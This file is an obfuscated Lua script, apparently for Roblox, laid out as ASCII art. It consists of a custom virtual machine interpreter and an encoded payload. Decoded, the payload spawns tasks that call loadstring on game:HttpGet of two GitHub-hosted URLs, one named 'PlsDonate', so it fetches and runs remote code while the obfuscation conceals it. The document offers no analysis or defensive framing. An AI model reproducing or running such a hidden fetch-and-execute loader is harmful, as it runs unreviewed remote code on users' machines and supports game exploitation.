                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if    
                                                    v19 then local v91=v5(v82,v19);v19=nil;return v91;else return v82;end end end);local function 
                                                   v20(v31,v32,v33) if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=( 
                                                  v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-(620 -(555 + 64))) -(v32-(1 + 0))) + (932 -(857 + 74)))) ;     
                                                return v84-(v84%1) ;end end else local v85=(570 -(367 + 201))^(v32-1) ;return (((v31%(v85 + v85))>=v85) 
                                                 and (928 -(214 + (1590 -(282 + 595))))) or (0 + 0) ;end end local function v21() local v34=1637 -(1523 + 
                                               114) ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==(0 + 0)) then v35=v1 
                                              (v16,v18,v18);v18=v18 + (1 -0) ;v34=1;end end end local function v22() local v36=1270 -((538 -312) + 1044) ;  
                                            local v37;local v38;while true do if (v36==(4 -3)) then return (v38 * 256) + v37 ;end if (v36==(117 -((58 -26) +  
                                            85))) then v37,v38=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;v36=958 -(892 + (118 -53)) ;end end end local function 
                                           v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (353 -((345 -258) + 263)) );v18=v18 + (184 -(67 + 113)) ;return (v42 * (  
                                          12302277 + 4474939)) + (v41 * (160901 -(96317 -(802 + 150)))) + (v40 * (189 + 67)) + v39 ;end local function v24() local  
                                          v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 -0 ,15 + 5 ) * ((999 -(915 + 82))^(90 -58))) + v43 ;local    
                                          v47=v20(v44,36 -15 ,19 + 12 );local v48=((v20(v44,41 -(894 -(261 + 624)) )==(1188 -(1069 + 118))) and  -(1 + 0)) or (2 -1)  
                                        ;if (v47==(0 -0)) then if (v46==(0 + (1423 -(630 + 793)))) then return v48 * (1138 -(116 + 1022)) ;else v47=(3 -2) -0 ;v45=(0 - 
                                        0) + 0 ;end elseif (v47==(7472 -5425)) then return ((v46==((1871 -(   --[[==============================]]1020 + 60)) -(368 + 423 
                                        ))) and (v48 * ((860 -(814 + (213 -168)))/(0 -0)))) or (v48 --[[============================================]] * NaN) ;end return 
                                         v8(v48,v47-(56 + 967) ) * (v45 + (v46/((6 -4)^(19 + 33 --[[======================================================]])))) ;end local 
                                       function v25(v49) local v50;if  not v49 then v49=v23 --[[==========================================================]]();if (v49==(0 +  
                                      0)) then return "";end end v50=v3(v16,v18,(v18 +    --[[==============================================================]]v49) -1 );v18=  
                                      v18 + v49 ;local v51={};for v66=3 -2 , #v50 do v51[ --[[================================================================]]v66]=v2(v1(v3(  
                                      v50,v66,v66)));end return v6(v51);end local v26=v23 --[[==================================================================]];local        
                                      function v27(...) return {...},v12("#",...);end     --[[==================================================================]]local function    
                                    v28() local v52=(function() return 1500 -(1408 + 92)  --[[====================================================================]];end)();local 
                     v53=(function() return;end)();local v54=(function() return;end)();   --[[====================================================================]]local v55=(     
              function() return;end)();local v56=(function() return;end)();local v57=(    --[[======================================================================]]function()    
            return;end)();local v58=(function() return;end)();local v59=(function()       --[[======================================================================]]return;end)() 
          ;while true do if (v52==(1087 -(461 + 625))) then local v88=(function() return  --[[======================================================================]]1288 -(993 +  
        295) ;end)();while true do if ((1 + 0)==v88) then v58=(function() return v23();   --[[======================================================================]]end)();v52=(  
        function() return 2 -0 ;end)();break;end if (v88==(74 -(71 + 3))) then v56=(      --[[======================================================================]]function()    
      return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v88=(function()    --[[======================================================================]]return 1;end) 
      ();end end end if ((0 + 0)~=v52) then else v53=(function() return function(v99,v100,  --[[==================================================================]]v101) local     
      v102=(function() return 0;end)();local v103=(function() return;end)();while true do   --[[================================================================]]if (v102==(0 + 0) 
    ) then v103=(function() return 0;end)();while true do if (v103==(0 + 0)) then local     --[[==============================================================]]v120=(function()  
    return 0 + 0 ;end)();while true do if (v120==(0 -0)) then local v148=(function() return   --[[==========================================================]]1769 -(1749 + 20) ; 
    end)();while true do if (v148~=(0 + 0)) then else v99[v100-#"/" ]=(function() return v101() --[[====================================================]];end)();return v99,v100 
    ,v101;end end end end end end break;end end end;end)();v54=(function() return {};end)();v55=( --[[==============================================]]function() return {};end) 
    ();v52=(function() return 1323 -(1249 + 73) ;end)();end if (v52==(3 -0)) then for v92= #"|",v23() --[[====================================]] do local v93=(function()     
    return v21();end)();if (v20(v93, #",", #"\\")==0) then local v106=(function() return 0 + 0 ;end)();   --[[========================]]local v107=(function() return;end)(); 
    local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v106~=(1147 -(466 + 679))) then else   
  while true do if (v107== #"-19") then if (v20(v109, #"91(", #"xnx")~= #" ") then else v110[ #"asd1"]=(function() return v59[v110[ #"0313"]];end)();end v54[v92]=(       
  function() return v110;end)();break;end if (v107~=(4 -2)) then else local v122=(function() return 0 -0 ;end)();local v123=(function() return;end)();while true do if  
  (v122==0) then v123=(function() return 0;end)();while true do if (v123~=(242 -(187 + 54))) then else v107=(function() return  #"nil";end)();break;end if (v123==(780 -( 
  162 + 618))) then if (v20(v109, #"/", #"[")== #"<") then v110[1 + 1 ]=(function() return v59[v110[5 -3 ]];end)();end if (v20(v109,2 + 0 ,2 + 0 )~= #"|") then else v110 
  [ #"xxx"]=(function() return v59[v110[ #"gha"]];end)();end v123=(function() return 585 -(57 + 527) ;end)();end end break;end end end if (v107== #"<") then local v124=( 
  function() return 1427 -(41 + 1386) ;end)();while true do if (v124~=(103 -(17 + 86))) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(0 -0))  
  then local v186=(function() return 0 + 0 ;end)();while true do if ((0 -0)==v186) then v110[ #"19("]=(function() return v22();end)();v110[ #"0836"]=(function() return   
  v22();end)();break;end end elseif (v108== #",") then v110[ #"nil"]=(function() return v23();end)();elseif (v108==(1638 -(1373 + 263))) then v110[ #"-19"]=(function()   
  return v23() -((168 -(122 + 44))^(1016 -(451 + 549))) ;end)();elseif (v108~= #"xnx") then else local v203=(function() return 0 -0 ;end)();local v204=(function() return 
  ;end)();while true do if (0~=v203) then else v204=(function() return 0;end)();while true do if (v204~=(0 + 0)) then else v110[ #"asd"]=(function() return v23() -((1 +  
  1)^(24 -8)) ;end)();v110[ #"?id="]=(function() return v22();end)();break;end end break;end end end v124=(function() return 1 -0 ;end)();end if (v124~=1) then else v107 
  =(function() return 67 -(30 + 35) ;end)();break;end end end if (v107==(0 + 0)) then local v125=(function() return 1257 -(1043 + 214) ;end)();local v126=(function()       
  return;end)();while true do if (v125==(1384 -(746 + 638))) then v126=(function() return 0 + 0 ;end)();while true do if (v126~=(1 -0)) then else v107=(function() return   
  #"~";end)();break;end if (v126==(341 -(218 + 123))) then v108=(function() return v20(v93,1583 -(1535 + 46) , #"nil");end)();v109=(function() return v20(v93, #"asd1",6 +  
  0 );end)();v126=(function() return 1 + 0 ;end)();end end break;end end end end break;end if (v106==(561 -(306 + 254))) then local v111=(function() return 320 -(53 + 267) 
   ;end)();local v112=(function() return;end)();while true do if ((0 + 0)==v111) then v112=(function() return 413 -(15 + 398) ;end)();while true do if (v112==(1 -0)) then  
  v106=(function() return 1469 -(899 + 568) ;end)();break;end if (v112~=(982 -(18 + 964))) then else v109=(function() return nil;end)();v110=(function() return nil;end)(); 
  v112=(function() return 1 + 0 ;end)();end end break;end end end if (0==v106) then local v113=(function() return 0 -0 ;end)();while true do if ((603 -(268 + 335))==v113)  
  then v107=(function() return 0 + 0 ;end)();v108=(function() return nil;end)();v113=(function() return 851 -(20 + 830) ;end)();end if (v113==1) then v106=(function()      
  return 291 -(60 + 230) ;end)();break;end end end end end end for v94= #"]",v23() do v55,v94,v28=(function() return v53(v55,v94,v28);end)();end return v57;end if (v52~=2) 
   then else local v89=(function() return 0;end)();local v90=(function() return;end)();while true do if (v89==(126 -(116 + 10))) then v90=(function() return 572 -(426 +    
  146) ;end)();while true do if ((0 + 0)~=v90) then else v59=(function() return {};end)();for v115= #"|",v58 do local v116=(function() return 1456 -(282 + 1174) ;end)();   
  local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116~=(1 + 0)) then else v119=(function( 
  ) return nil;end)();while true do if (v117==(739 -(542 + 196))) then if (v118== #"|") then v119=(function() return v21()~=0 ;end)();elseif (v118==(813 -(569 + 242)))     
  then v119=(function() return v24();end)();elseif (v118== #"gha") then v119=(function() return v25();end)();end v59[v115]=(function() return v119;end)();break;end if (  
  v117~=(0 -0)) then else local v179=(function() return 0;end)();while true do if (v179~=0) then else v118=(function() return v21();end)();v119=(function() return nil;   
  end)();v179=(function() return 1 + 0 ;end)();end if (v179==(1025 -(706 + 318))) then v117=(function() return 1252 -(721 + 530) ;end)();break;end end end end break;end  
    if (v116==(0 -0)) then local v127=(function() return 1271 -(945 + 326) ;end)();while true do if (v127==(1551 -(1126 + 425))) then v117=(function() return 0;end)();   
    v118=(function() return nil;end)();v127=(function() return 2 -1 ;end)();end if (v127==(406 -(118 + 287))) then v116=(function() return 3 -2 ;end)();break;end end end 
     end end v90=(function() return 1 + 0 ;end)();end if (v90==(701 -(271 + 429))) then v57[ #"xxx"]=(function() return v21();end)();v52=(function() return 3 + 0 ;end)() 
    ;break;end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[379 -(142 + 235) ];local v65=v60[13 -10 ];return function 
      (...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1 + (1189 -(449 + 740)) ;local v73= -(978 -(553 + 424));local v74={};local v75={...};     
      local v76=v12("#",...) -(1 -0) ;local v77={};local v78={};for v86=0 + 0 ,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 + 0 ];else v78[v86]=v75[v86 + 1 ];   
      end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do local v87=0 + 0 ;while true do if (v87==(872 -(826 + 46))) then v80=v68[v72];v81=v80[1];   
        v87=1 + 0 ;end if ((3794>3693) and (1==v87)) then if (v81<=((968 -(245 + 702)) -11)) then if (v81<=(11 -(21 -14))) then if (v81<=1) then if ((v81>(0 -0)) or (  
        1275==4100)) then local v128=v80[2];local v129,v130=v71(v78[v128](v13(v78,v128 + 1 + 0 ,v73)));v73=(v130 + v128) -(4 -3) ;local v131=0;for v150=v128,v73 do     
        v131=v131 + 1 ;v78[v150]=v129[v131];end else do return;end end elseif (v81<=2) then v78[v80[755 -(77 + 162 + 514) ]]=v62[v80[(1900 -(260 + 1638)) + (441 -(382  
          + 58)) ]];elseif (v81==(1332 -(797 + (1706 -1174)))) then v78[v80[2 + 0 ]]={};else local v156=v80[1 + 1 ];v78[v156](v13(v78,v156 + (2 -1) ,v73));end elseif 
             (v81<=(1209 -(373 + 829))) then if (v81<=(736 -(476 + 212 + 43))) then if (v78[v80[2]]==v80[1134 -((762 -393) + 761) ]) then v72=v72 + 1 + 0 ;else v72=  
              v80[5 -2 ];end elseif (v81>6) then v78[v80[(8 -5) -(1206 -(902 + 303)) ]]=v62[v80[241 -(64 + 174) ]];elseif (v78[v80[1 + 1 ]]==v80[5 -1 ]) then v72=v72 
                 + (337 -(144 + 192)) ;else v72=v80[3];end elseif (v81<=8) then local v134=v80[218 -(42 + 174) ];local v135,v136=v71(v78[v134](v13(v78,v134 + 1 + 0 , 
                  v80[3 + 0 ])));v73=(v136 + v134) -(1 + 0) ;local v137=1504 -(363 + 1141) ;for v153=v134,v73 do local v154=1580 -(1183 + (871 -474)) ;while true   
                      do if (v154==(0 -0)) then v137=v137 + 1 + 0 ;v78[v153]=v135[v137];break;end end end elseif (v81>9) then do return;end else local v160=0;local 
                                   v161;local v162;while true do if (((1 + (0 -0))==v160) or (1591>=3580)) then v78[v161 + 1 ]=v162;v78[v161]=v162[v80[(171 + 1808) 
                                       -(1913 + 62) ]];break;end if ((983<=1808) and ((0 + 0)==v160)) then v161=v80[2];v162=v78[v80[7 -4 ]];v160=1934 -(565 + 1368) 
                                       ;end end end elseif ((v81<=((1746 -(1121 + 569)) -41)) or (          2150<=1197)) then if (v81<=(1673 -(1477 + 184))) then   
                                      if (v81>(14 -3)) then v78[v80[2 + 0 ]]=v78[v80[(1073 -(22 +           192)) -(564 + 292) ]][v80[6 -2 ]];else local v140=v80 
                                      [5 -3 ];local v141=v78[v80[3]];v78[v140 + (305 -(244 + 60)) ]         =v141;v78[v140]=v141[v80[4 + 0 ]];end elseif ((3769>= 
                                      1173) and (v81<=(489 -(41 + 435)))) then local v145=v80[1003          -(938 + 63) ];v78[v145](v13(v78,v145 + 1 + 0 ,v73));  
                                      elseif (v81==(1139 -(936 + 189))) then v78[v80[(684 -(483 +             200)) + 1 ]]=v80[1616 -(1565 + 48) ];else v78[v80[2 
                                       + 0 ]]=v80[3];end elseif ((1485==1485) and (v81<=18)) then             if (v81<=(1154 -(782 + 356))) then v72=v80[270 -(   
                                      176 + 91) ];elseif ((v81>(43 -26)) or (3315<=2782)) then                local v167=v80[(1465 -(1404 + 59)) -0 ];local     
                                        v168,v169=v71(v78[v167](v13(v78,v167 + 1 ,v73)));v73=(v169            + v167) -1 ;local v170=1092 -(975 + 117) ;for     
                                        v180=v167,v73 do v170=v170 + 1 ;v78[v180]=v168[v170];end                else local v171=v80[1877 -(157 + 1718) ];local  
                                        v172,v173=v71(v78[v171](v13(v78,v171 + 1 + 0 ,v80[10 -7 ]))             );v73=(v173 + v171) -(3 -2) ;local v174=1018  
                                        -(697 + 321) ;for v183=v171,v73 do local v184=0 -0 ;while                true do if ((v184==(0 -0)) or (876>=2964))   
                                        then v174=v174 + (2 -1) ;v78[v183]=v172[v174];break;end                   end end end elseif (v81<=19) then v72=v80 
                                        [3];elseif (v81==(8 + 12)) then v78[v80[(8 -5) -1 ]]=v78[                 v80[7 -(4 -0) ]][v80[1231 -(322 + 905) ]] 
                                          ;else v78[v80[(1378 -(468 + 297)) -(602 + 9) ]]={};end                    v72=v72 + 1 ;break;end end end end;   
                                          end return v29(v28(),{},v17)(...);end return v15(                                                           
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!083Q00028Q0003043Q007461736B03053Q00737061776E030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403893Q00682Q7470733A2Q2F676973742E67697468756275736572636F6E74656E742E636F6D2F41696E73776F7274684E652Q636F2F32353832666334373066343539346637383962332Q34313630356433612Q34322F7261772F3965396361363933346235652Q66302Q37382Q6561383934333936393237383966633936313666612F506C73446F6E617465034E3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F41696E73776F7274684E652Q636F2F4C7963686B696E2F726566732F68656164732F6D61696E2F4D61696E3100194Q00157Q00120F000100013Q00260500010002000100010004133Q00020001001207000200023Q002014000200020003001207000300043Q001207000400053Q00200B00040004000600120F000600074Q0008000400064Q000100036Q000D00023Q0001001207000200023Q002014000200020003001207000300043Q001207000400053Q00200B00040004000600120F000600084Q0008000400064Q000100036Q000D00023Q00010004133Q001800010004133Q000200012Q000A3Q00017Q00",v9(),...);
